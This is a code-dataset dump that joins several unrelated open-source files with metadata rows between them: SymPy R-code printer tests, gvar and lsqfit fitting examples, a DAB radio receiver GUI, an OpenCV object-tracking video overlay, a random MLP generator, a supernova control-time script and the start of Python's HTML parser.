assert rcode(Lt(x, y)) == "x < y"
assert rcode(Gt(x, y)) == "x > y"
assert rcode(Ge(x, y)) == "x >= y"
def test_rcode_Piecewise():
expr = Piecewise((x, x < 1), (x**2, True))
res=rcode(expr)
ref="ifelse(x < 1,x,x^2)"
assert res == ref
tau=Symbol("tau")
res=rcode(expr,tau)
ref="tau = ifelse(x < 1,x,x^2);"
assert res == ref
expr = 2*Piecewise((x, x < 1), (x**2, x<2), (x**3,True))
assert rcode(expr) == "2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3))"
res = rcode(expr, assign_to='c')
assert res == "c = 2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3));"
# Check that Piecewise without a True (default) condition error
#expr = Piecewise((x, x < 1), (x**2, x > 1), (sin(x), x > 0))
#raises(ValueError, lambda: rcode(expr))
expr = 2*Piecewise((x, x < 1), (x**2, x<2))
assert(rcode(expr))== "2*ifelse(x < 1,x,ifelse(x < 2,x^2,NA))"
def test_rcode_sinc():
from sympy import sinc
expr = sinc(x)
res = rcode(expr)
ref = "ifelse(x != 0,sin(x)/x,1)"
assert res == ref
def test_rcode_Piecewise_deep():
p = rcode(2*Piecewise((x, x < 1), (x + 1, x < 2), (x**2, True)))
assert p == "2*ifelse(x < 1,x,ifelse(x < 2,x + 1,x^2))"
expr = x*y*z + x**2 + y**2 + Piecewise((0, x < 0.5), (1, True)) + cos(z) - 1
p = rcode(expr)
ref="x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1"
assert p == ref
ref="c = x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1;"
p = rcode(expr, assign_to='c')
assert p == ref
def test_rcode_ITE():
expr = ITE(x < 1, y, z)
p = rcode(expr)
ref="ifelse(x < 1,y,z)"
assert p == ref
def test_rcode_settings():
raises(TypeError, lambda: rcode(sin(x), method="garbage"))
def test_rcode_Indexed():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o = symbols('n m o', integer=True)
i, j, k = Idx('i', n), Idx('j', m), Idx('k', o)
p = RCodePrinter()
p._not_r = set()
x = IndexedBase('x')[j]
assert p._print_Indexed(x) == 'x[j]'
A = IndexedBase('A')[i, j]
assert p._print_Indexed(A) == 'A[i, j]'
B = IndexedBase('B')[i, j, k]
assert p._print_Indexed(B) == 'B[i, j, k]'
assert p._not_r == set()
def test_rcode_Indexed_without_looking_for_contraction():
len_y = 5
y = IndexedBase('y', shape=(len_y,))
x = IndexedBase('x', shape=(len_y,))
Dy = IndexedBase('Dy', shape=(len_y-1,))
i = Idx('i', len_y-1)
e=Eq(Dy[i], (y[i+1]-y[i])/(x[i+1]-x[i]))
code0 = rcode(e.rhs, assign_to=e.lhs, contract=False)
assert code0 == 'Dy[i] = (y[%s] - y[i])/(x[%s] - x[i]);' % (i + 1, i + 1)
def test_rcode_loops_matrix_vector():
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j], assign_to=y[i])
assert c == s
def test_dummy_loops():
# the following line could also be
# [Dummy(s, integer=True) for s in 'im']
# or [Dummy(integer=True) for s in 'im']
i, m = symbols('i m', integer=True, cls=Dummy)
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx(i, m)
expected = (
'for (i_%(icount)i in 1:m_%(mcount)i){\n'
' y[i_%(icount)i] = x[i_%(icount)i];\n'
'}'
) % {'icount': i.label.dummy_index, 'mcount': m.dummy_index}
code = rcode(x[i], assign_to=y[i])
assert code == expected
def test_rcode_loops_add():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
z = IndexedBase('z')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = x[i] + z[i];\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j] + x[i] + z[i], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_contractions():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = a[i, j, k, l]*b[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode(b[j, k, l]*a[i, j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_addfactor():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = (a[i, j, k, l] + b[i, j, k, l])*c[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode((a[i, j, k, l] + b[i, j, k, l])*c[j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_terms():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
s0 = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
)
s1 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' y[i] = b[j]*b[k]*c[i, j, k] + y[i];\n'
' }\n'
' }\n'
'}\n'
)
s2 = (
'for (i in 1:m){\n'
' for (k in 1:o){\n'
' y[i] = a[i, k]*b[k] + y[i];\n'
' }\n'
'}\n'
)
s3 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = a[i, j]*b[j] + y[i];\n'
' }\n'
'}\n'
)
c = rcode(
b[j]*a[i, j] + b[k]*a[i, k] + b[j]*b[k]*c[i, j, k], assign_to=y[i])
ref=dict()
ref[0] = s0 + s1 + s2 + s3[:-1]
ref[1] = s0 + s1 + s3 + s2[:-1]
ref[2] = s0 + s2 + s1 + s3[:-1]
ref[3] = s0 + s2 + s3 + s1[:-1]
ref[4] = s0 + s3 + s1 + s2[:-1]
ref[5] = s0 + s3 + s2 + s1[:-1]
assert (c == ref[0] or
c == ref[1] or
c == ref[2] or
c == ref[3] or
c == ref[4] or
c == ref[5])
def test_dereference_printing():
expr = x + y + sin(z) + z
assert rcode(expr, dereference=[z]) == "x + y + (*z) + sin((*z))"
def test_Matrix_printing():
# Test returning a Matrix
mat = Matrix([x*y, Piecewise((2 + x, y>0), (y, True)), sin(z)])
A = MatrixSymbol('A', 3, 1)
p = rcode(mat, A)
assert p == (
"A[0] = x*y;\n"
"A[1] = ifelse(y > 0,x + 2,y);\n"
"A[2] = sin(z);")
# Test using MatrixElements in expressions
expr = Piecewise((2*A[2, 0], x > 0), (A[2, 0], True)) + sin(A[1, 0]) + A[0, 0]
p = rcode(expr)
assert p == ("ifelse(x > 0,2*A[2],A[2]) + sin(A[1]) + A[0]")
# Test using MatrixElements in a Matrix
q = MatrixSymbol('q', 5, 1)
M = MatrixSymbol('M', 3, 3)
m = Matrix([[sin(q[1,0]), 0, cos(q[2,0])],
[q[1,0] + q[2,0], q[3, 0], 5],
[2*q[4, 0]/q[1,0], sqrt(q[0,0]) + 4, 0]])
assert rcode(m, M) == (
"M[0] = sin(q[1]);\n"
"M[1] = 0;\n"
"M[2] = cos(q[2]);\n"
"M[3] = q[1] + q[2];\n"
"M[4] = q[3];\n"
"M[5] = 5;\n"
"M[6] = 2*q[4]/q[1];\n"
"M[7] = sqrt(q[0]) + 4;\n"
"M[8] = 0;")
def test_rcode_sgn():
expr = sign(x) * y
assert rcode(expr) == 'y*sign(x)'
p = rcode(expr, 'z')
assert p == 'z = y*sign(x);'
p = rcode(sign(2 * x + x**2) * x + x**2)
assert p == "x^2 + x*sign(x^2 + 2*x)"
expr = sign(cos(x))
p = rcode(expr)
assert p == 'sign(cos(x))'
def test_rcode_Assignment():
assert rcode(Assignment(x, y + z)) == 'x = y + z;'
assert rcode(aug_assign(x, '+', y + z)) == 'x += y + z;'
def test_rcode_For():
f = For(x, Range(0, 10, 2), [aug_assign(y, '*', x)])
sol = rcode(f)
assert sol == ("for (x = 0; x < 10; x += 2) {\n"
" y *= x;\n"
"}")
def test_MatrixElement_printing():
# test cases for issue #11821
A = MatrixSymbol("A", 1, 3)
B = MatrixSymbol("B", 1, 3)
C = MatrixSymbol("C", 1, 3)
assert(rcode(A[0, 0]) == "A[0]")
assert(rcode(3 * A[0, 0]) == "3*A[0]")
F = C[0, 0].subs(C, A - B)
assert(rcode(F) == "(A - B)[0]")
| bsd-3-clause | -5,326,308,247,995,265,000 | 27.87169 | 105 | 0.482294 | false | 2.501941 | true | false | false |
gplepage/gvar | examples/svdcut.py | 1 | 2303 | """
svdcut.py --- Correlations and SVD Cuts
This code illustrates the use of SVD cuts when calculating
correlations using random samples. See the Case Study in the
documentation for more information.
"""
from __future__ import print_function
import numpy as np
import gvar as gv
try:
# may not be installed, in which case bail.
import lsqfit
except:
# fake the run so "make run" still works
outfile = open('svdcut.out', 'r').read()
print(outfile[:-1])
exit()
SHOW_PLOTS = False
def main():
gv.ranseed(4)
x = np.array([1., 2., 3., 4., 5., 6., 7., 8., 9., 10.])
y_samples = [
[2.8409, 4.8393, 6.8403, 8.8377, 10.8356, 12.8389, 14.8356, 16.8362, 18.8351, 20.8341],
[2.8639, 4.8612, 6.8597, 8.8559, 10.8537, 12.8525, 14.8498, 16.8487, 18.8460, 20.8447],
[3.1048, 5.1072, 7.1071, 9.1076, 11.1090, 13.1107, 15.1113, 17.1134, 19.1145, 21.1163],
[3.0710, 5.0696, 7.0708, 9.0705, 11.0694, 13.0681, 15.0693, 17.0695, 19.0667, 21.0678],
[3.0241, 5.0223, 7.0198, 9.0204, 11.0191, 13.0193, 15.0198, 17.0163, 19.0154, 21.0155],
[2.9719, 4.9700, 6.9709, 8.9706, 10.9707, 12.9705, 14.9699, 16.9686, 18.9676, 20.9686],
[3.0688, 5.0709, 7.0724, 9.0730, 11.0749, 13.0776, 15.0790, 17.0800, 19.0794, 21.0795],
[3.1471, 5.1468, 7.1452, 9.1451, 11.1429, 13.1445, 15.1450, 17.1435, 19.1425, 21.1432],
[3.0233, 5.0233, 7.0225, 9.0224, 11.0225, 13.0216, 15.0224, 17.0217, 19.0208, 21.0222],
[2.8797, 4.8792, 6.8803, 8.8794, 10.8800, 12.8797, 14.8801, 16.8797, 18.8803, 20.8812],
[3.0388, 5.0407, 7.0409, 9.0439, 11.0443, 13.0459, 15.0455, 17.0479, 19.0493, 21.0505],
[3.1353, 5.1368, 7.1376, 9.1367, 11.1360, 13.1377, 15.1369, 17.1400, 19.1384, 21.1396],
[3.0051, 5.0063, 7.0022, 9.0052, 11.0040, 13.0033, 15.0007, 16.9989, 18.9994, 20.9995],
]
y = gv.dataset.avg_data(y_samples)
svd = gv.dataset.svd_diagnosis(y_samples)
y = gv.svd(y, svdcut=svd.svdcut)
if SHOW_PLOTS:
svd.plot_ratio(show=True)
def fcn(p):
return p['y0'] + p['s'] * x
prior = gv.gvar(dict(y0='0(5)', s='0(5)'))
fit = lsqfit.nonlinear_fit(data=y, fcn=fcn, prior=prior)
print(fit)
if __name__ == '__main__':
main()
| gpl-3.0 | 5,101,233,874,259,818,000 | 40.125 | 98 | 0.583152 | false | 2.156367 | false | false | false |
alex-ip/agdc | agdc/landsat_ingester/__main__.py | 1 | 2058 | #!/usr/bin/env python
# ===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===============================================================================
"""
landsat_ingester.py - Ingester script for landsat datasets.
"""
from __future__ import absolute_import
from agdc.landsat_ingester import LandsatIngester
from agdc.abstract_ingester import run_ingest
if __name__ == "__main__":
run_ingest(LandsatIngester)
| bsd-3-clause | 2,366,633,804,520,542,700 | 49.45 | 86 | 0.68999 | false | 4.48366 | false | false | false |
GAMPTeam/vampyre | demos/mlp/randmlp.py | 1 | 3387 | # -*- coding: utf-8 -*-
"""
randmlp: Random MLP class definitions
@author: Sundeep
"""
import numpy as np
import pickle
"""
Randomly generated multilayer perceptron
"""
class RandomMLP:
"""
Constructor
"""
    def __init__(self, nin, nhid, nout, sparse_tgt=None):
# Get dimensions
self.nin = nin
self.nhid = nhid
self.nout = nout
self.nlayers = len(nhid)
# Sparsity target to adjust bias levels in each layer
if sparse_tgt is None:
self.sparse_tgt = 0.4*np.ones(self.nlayers)
else:
self.sparse_tgt = sparse_tgt
# Number of samples used in calibrating the parameters
self.ns = 100
# Pickle file name
self.save_file = 'mlp.p'
"""
Saves the weights to a pickle file
"""
def save_weigths(self):
pickle.dump((self.Ws,self.bs), open(self.save_file, "wb") )
"""
Restore weights
"""
def restore_weigths(self):
self.Ws, self.bs = pickle.load(open(self.save_file, "rb") )
"""
Generate random weights based on sparsity in each layer
"""
def gen_weigths(self):
# Create list to store weights and biases
self.Ws = []
self.bs = []
self.z0s = []
self.z1s = []
# Generate random input
x = np.random.randn(self.nin,self.ns)
z0 = x
for i in range(self.nlayers+1):
self.z0s.append(z0)
# Get dimensions for the layer
n0 = z0.shape[0]
if i==self.nlayers:
n1 = self.nout
stgt = 1
else:
n1 = self.nhid[i]
stgt = self.sparse_tgt[i]
# Generate linear outputs w/o bias
z0norm = np.mean(np.abs(z0)**2)
W = np.random.randn(n1,n0)/np.sqrt(n0*z0norm)
z1 = W.dot(z0)
# Sort to find the biases that adjust the correct sparsity
# level
if stgt < 1:
zsort = np.sort(z1,axis=1)
itgt = int((1-stgt)*self.ns)
b = -zsort[:,itgt]
else:
b = np.random.randn(n1)
z1 = z1 + b[:,None]
# Apply the ReLU for the next layer
z0 = np.maximum(0, z1)
# Save the weights and biases
self.Ws.append(W)
self.bs.append(b)
self.z1s.append(z1)
"""
Generate the outputs given input x
"""
def run(self, z0=[], ns=10):
        # Generate random initial states if they are unspecified
if z0 == []:
z0 = np.random.randn(self.nin,ns)
# Lists to store intermediate variables
zs = []
# Loop over layers
for i in range(self.nlayers+1):
# Save input
zs.append(z0)
# Linear weights
W = self.Ws[i]
b = self.bs[i]
z1 = W.dot(z0)+b[:,None]
# Save ouptut
zs.append(z1)
# ReLU for the next layer
z0 = np.maximum(0, z1)
return zs
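# Illustrative usage sketch -- not part of the original module; the layer
# sizes and sparsity targets below are arbitrary example values.
if __name__ == '__main__':
    mlp = RandomMLP(nin=10, nhid=[20, 15], nout=3, sparse_tgt=[0.4, 0.3])
    mlp.gen_weigths()   # generate and calibrate random weights (method name as spelled in the class)
    zs = mlp.run(ns=5)  # zs alternates layer inputs and linear (pre-ReLU) outputs
    print(len(zs))      # 2*(nlayers + 1) entries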
| mit | -1,413,568,176,545,062,700 | 25.460938 | 72 | 0.459404 | false | 3.801347 | false | false | false |
kit-cel/gr-dab | apps/dab_rx_constellation.py | 1 | 6407 | #!/usr/bin/env python2
# -*- coding: utf8 -*-
# Andreas Müller, 2008
# [email protected]
#
# this code may be freely used under GNU GPL conditions
"""
demodulate DAB signal and ouput to constellation sink
"""
from gnuradio import gr, uhd, blocks
from gnuradio import eng_notation
from gnuradio.eng_option import eng_option
from gnuradio.wxgui import stdgui2, fftsink2, scopesink2
import dab
from optparse import OptionParser
import wx
import sys, threading, time
class usrp_dab_gui_rx(stdgui2.std_top_block):
def __init__(self, frame, panel, vbox, argv):
stdgui2.std_top_block.__init__(self, frame, panel, vbox, argv)
self.frame = frame
self.panel = panel
parser = OptionParser(option_class=eng_option, usage="%prog: [options] <filename>")
parser.add_option("-m", "--dab-mode", type="int", default=1,
help="DAB mode [default=%default]")
parser.add_option("-F", "--filter-input", action="store_true", default=False,
help="Enable FFT filter at input")
parser.add_option('-c', '--correct-ffe', action="store_true", default=False,
help="do fine frequency correction")
parser.add_option('-u', '--correct-ffe-usrp', action="store_true", default=False,
help="do fine frequency correction by retuning the USRP instead of in software")
parser.add_option('-e', '--equalize-magnitude', action="store_true", default=False,
help="do magnitude equalization")
parser.add_option("-s", "--resample-fixed", type="eng_float", default=1,
help="resample by a fixed factor (fractional interpolation)")
parser.add_option("-S", "--autocorrect-sample-rate", action="store_true", default=False,
help="Estimate sample rate offset and resample (dynamic fractional interpolation)")
parser.add_option("-R", "--rx-subdev-spec", type="subdev", default=(0, 0),
help="select USRP Rx side A or B [default=A]")
parser.add_option("-f", "--freq", type="eng_float", default=227.36e6,
help="set frequency to FREQ [default=%default]")
parser.add_option("-r", "--sample-rate", type="int", default=2000000,
help="set sample rate to SAMPLE_RATE [default=%default]")
parser.add_option("-d", "--decim", type="intx", default=32,
help="set decimation rate to DECIM [default=%default]")
parser.add_option("-g", "--rx-gain", type="eng_float", default=None,
help="set receive gain in dB (default is midpoint)")
parser.add_option('-v', '--verbose', action="store_true", default=False,
help="verbose output")
parser.add_option('-a', '--antenna', type="string", default="TX/RX",
help="select antenna")
(options, args) = parser.parse_args()
self.verbose = options.verbose
if len(args) == 0:
if self.verbose:
print "--> receiving from USRP"
self.src = uhd.usrp_source("",uhd.io_type.COMPLEX_FLOAT32,1)
#self.src.set_mux(usrp.determine_rx_mux_value(self.src, options.rx_subdev_spec))
#self.subdev = usrp.selected_subdev(self.src, options.rx_subdev_spec)
#if self.verbose:
# print "--> using RX dboard " + self.subdev.side_and_name()
# tune frequency
self.frequency = options.freq
self.set_freq(options.freq)
# set gain
if options.rx_gain is None:
# if no gain was specified, use the mid-point in dB
g = self.src.get_gain_range()
options.rx_gain = float(g.start()+g.stop())/2
self.src.set_gain(options.rx_gain)
self.sample_rate = 2e6#self.src.adc_rate()/options.decim
self.src.set_samp_rate(self.sample_rate)
self.src.set_antenna(options.antenna)
else:
if self.verbose:
print "--> receiving from file: " + args[0]
self.filename = args[0]
self.src = blocks.file_source(gr.sizeof_gr_complex, self.filename, False)
self.sample_rate = options.sample_rate
self.dab_params = dab.parameters.dab_parameters(mode=options.dab_mode, sample_rate=self.sample_rate, verbose=options.verbose)
self.rx_params = dab.parameters.receiver_parameters(mode=options.dab_mode, softbits=True, input_fft_filter=options.filter_input, autocorrect_sample_rate=options.autocorrect_sample_rate, sample_rate_correction_factor=options.resample_fixed, verbose=options.verbose, correct_ffe=options.correct_ffe, equalize_magnitude=options.equalize_magnitude)
self.demod = dab.ofdm_demod(self.dab_params, self.rx_params, verbose=self.verbose)
self.v2s = blocks.vector_to_stream(gr.sizeof_gr_complex, self.dab_params.num_carriers)
self.scope = scopesink2.scope_sink_c(self.panel, title="DAB constellation sink", sample_rate=self.dab_params.sample_rate, xy_mode=True)
self.trigsink = blocks.null_sink(gr.sizeof_char)
self.sink = blocks.null_sink(gr.sizeof_float*self.dab_params.num_carriers*2)
self.connect(self.src, self.demod, self.sink)
self.connect((self.demod,1), self.trigsink)
# build GUI
self.connect(self.demod.deinterleave, self.v2s, self.scope)
vbox.Add(self.scope.win, 10, wx.EXPAND)
self.wxgui_fftsink2_0 = fftsink2.fft_sink_c(
self.panel,
baseband_freq=0,
y_per_div=10,
y_divs=10,
ref_level=0,
ref_scale=2.0,
sample_rate=self.sample_rate,
fft_size=1024,
fft_rate=15,
average=False,
avg_alpha=None,
title="FFT Plot",
peak_hold=False,
)
vbox.Add(self.wxgui_fftsink2_0.win)
self.connect((self.src, 0), (self.wxgui_fftsink2_0, 0))
# retune USRP to correct FFE?
self.correct_ffe_usrp = options.correct_ffe_usrp
if self.correct_ffe_usrp:
print "--> correcting FFE on USRP"
self.run_correct_ffe_thread = True
self.ffe_updater = threading.Timer(0.1, self.correct_ffe)
self.ffe_updater.setDaemon(True)
self.ffe_updater.start()
def correct_ffe(self):
while self.run_correct_ffe_thread:
diff = self.demod.sync.ffs_sample_and_average_arg.ffe_estimate()
if abs(diff) > self.rx_params.usrp_ffc_min_deviation:
self.frequency -= diff*self.rx_params.usrp_ffc_adapt_factor
print "--> updating fine frequency correction: " + str(self.frequency)
self.set_freq(self.frequency)
time.sleep(1./self.rx_params.usrp_ffc_retune_frequency)
def set_freq(self, freq):
if self.src.set_center_freq(freq):
if self.verbose:
print "--> retuned to " + str(freq) + " Hz"
return True
else:
print "-> error - cannot tune to " + str(freq) + " Hz"
return False
if __name__ == '__main__':
app = stdgui2.stdapp(usrp_dab_gui_rx, "usrp_dab_gui_rx", nstatus=1)
app.MainLoop()
| gpl-3.0 | 8,074,108,952,524,165,000 | 38.54321 | 346 | 0.685295 | false | 2.905215 | false | false | false |
reliableJARED/python | opencv/video_on_video_overlay_tracked_obj.py | 1 | 4338 | '''
This code will put a video on a colored object (like a green ball)in the main
video stream. It will resize the overlay video on the fly
based on big the tracked object is. The code will not work without
the file: hist_for_tracking.png
that is the 'color calibration' image. The program does allow you
to calibrate to any color. press 'x' while an image is in the
green box shown on the screen and it will recalibrate to
that and update the 'hist_for_tracking.png' . You also need something to overlay. replace
'video1.mp4' with what ever video or image you want to overlay on the tracked object.
I can show you how to use this program if you're
looking for this type of application. Its just a basic demo
'''
#the sys import is needed to pick up files that aren't on the default python path, like common.py
import sys
sys.path.append('/home/jared/PythonWork/opencv')
import cv2 #NOTE: this is from OpenCV
import numpy as np
#get video frame
frame = cv2.VideoCapture(0)
def read_overlay():
vid = cv2.VideoCapture('video1.mp4')
return vid
while (True):
#get pic to be used as tracking histogram
roi = cv2.imread('hist_for_tracking.png')
search_hsv = cv2.cvtColor(roi,cv2.COLOR_BGR2HSV)
#get next video frame
check, img = frame.read()
    #this try/except and the check below start the overlay video and keep it looping
try:
check2, track_img = vid.read()
except:
vid = read_overlay()
check2, track_img = vid.read()
if check2 == False:
vid = read_overlay()
check2, track_img = vid.read()
#when check2 == False, the vid is over.
find_hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#calculate histogram of color to look for
#calcHist([image],[channel],mask,[histogram bin count(256 full)],range(256 full))
roihist = cv2.calcHist([search_hsv],[0,1], None, [50,256], [0,180,0,256] )
#ORIGINAL:
#roihist = cv2.calcHist([search_hsv],[0,1], None, [180,256], [0,180,0,256] )
# normalize histogram and apply backprojection
cv2.normalize(roihist,roihist,0,255,cv2.NORM_MINMAX)
dst = cv2.calcBackProject([find_hsv],[0,1],roihist,[0,180,0,256],1)
# Now convolute with circular disc
#--not sure what that means
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
cv2.filter2D(dst,-1,disc,dst)
#Find all the blobs that match tracked color
#using dst as input will be looking for black and white as dst has no color
contours, hier = cv2.findContours(dst,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
#determine which contour is the largest
    big_area = 0
    big_shape = None
for shape in contours:
check = cv2.contourArea(shape)
if check > big_area:
#set new biggest area
big_area = cv2.contourArea(shape)
#identify largest shape so that x,y is known
big_shape = shape
    if big_shape is not None and big_shape.any():
if 10<cv2.contourArea(big_shape):
#determine shape of a rectangle that would enclose the obj
(x,y,w,h) = cv2.boundingRect(big_shape)
#read image to be displayed
if check2==True:
pic = track_img
#resize image based on boundingRect() coordinates
new_dimensions = (int(w),int(h))
new_pic = cv2.resize(pic,new_dimensions,interpolation=cv2.INTER_AREA)
img[y:y+h,x:x+w]=new_pic
if check2 == False:
vid.release()
# threshold and binary AND
ret,thresh = cv2.threshold(dst,50,255,0)
thresh = cv2.merge((thresh,thresh,thresh))
resb = cv2.bitwise_and(img, thresh)
cv2.imshow('color_select',resb)
#put rectangle on screen where screen shot will grab from
cv2.rectangle(img,(250,200),(350,300),(0,255,0),2)
cv2.imshow('live',img)
ScreenShot = cv2.waitKey(25)& 0xFF
if ScreenShot == ord('x'):
#if 'x' is pressed
#displays a screen shot of image in rectangle
#saves it for use in histogram[y:y,x:x]
cv2.imshow('Color2Track',img[200:300,250:350])
cv2.imwrite('hist_for_tracking.png',img[200:300,250:350])
if cv2.waitKey(25) &0xFF== ord('q'):
#when everything done, release the capture
frame.release()
cv2.destroyAllWindows()
break
| gpl-3.0 | -4,845,308,143,406,473,000 | 35.453782 | 90 | 0.638774 | false | 3.386417 | false | false | false |
cosmodesi/snsurvey | src/control.py | 1 | 1120 | #!/usr/bin/env python
import numpy
import sncosmo
import scipy.optimize
import matplotlib.pyplot as plt
model=sncosmo.Model(source='salt2-extended')
def f(t ,rlim):
# print t, model.bandflux('desr',t, zp = rlim, zpsys='ab')
return model.bandflux('desr',t, zp = rlim, zpsys='ab')-1.
def controlTime(z,rlim):
model.set(z=z, t0=55000.)
model.set_source_peakabsmag(absmag=-19.3,band='bessellb',magsys='ab')
pre = scipy.optimize.fsolve(f, 55000.-15*(1+z) ,args=(rlim),xtol=1e-8)
post = scipy.optimize.fsolve(f, 55000.+20*(1+z) ,args=(rlim),xtol=1e-8)
return max(post[0]-pre[0],0)
# print scipy.optimize.fsolve(f, 55000.+40,args=(rlim),factor=1.,xtol=1e-8)
def plot():
lmag = numpy.arange(19.5,21.6,0.5)
zs = numpy.arange(0.02, 0.2501,0.02)
ans = []
for lm in lmag:
ans_=[]
for z in zs:
ans_.append(controlTime(z,lm))
ans.append(ans_)
for lm, ct in zip(lmag, ans):
plt.plot(zs, ct, label = '$r_{{lim}} = {}$'.format(str(lm)))
plt.xlabel(r'$z$')
plt.ylabel(r'control time (days)')
plt.legend()
plt.show()
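# Minimal entry point added for illustration (not in the original file); it
# assumes plot() is the intended demo and that a matplotlib backend is available.
if __name__ == '__main__':
    plot()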
| bsd-3-clause | -1,581,675,154,253,889,500 | 26.317073 | 79 | 0.605357 | false | 2.528217 | false | false | false |
prefetchnta/questlab | bin/x64bin/python/37/Lib/html/parser.py | 1 | 18191 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import re
import warnings
import _markupbase
from html import unescape
__all__ = ['HTMLParser']
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
# Note:
# 1) if you change tagfind/attrfind remember to update locatestarttagend too;
# 2) if you change tagfind/attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile(r'([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][^\t\n\r\f />\x00]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
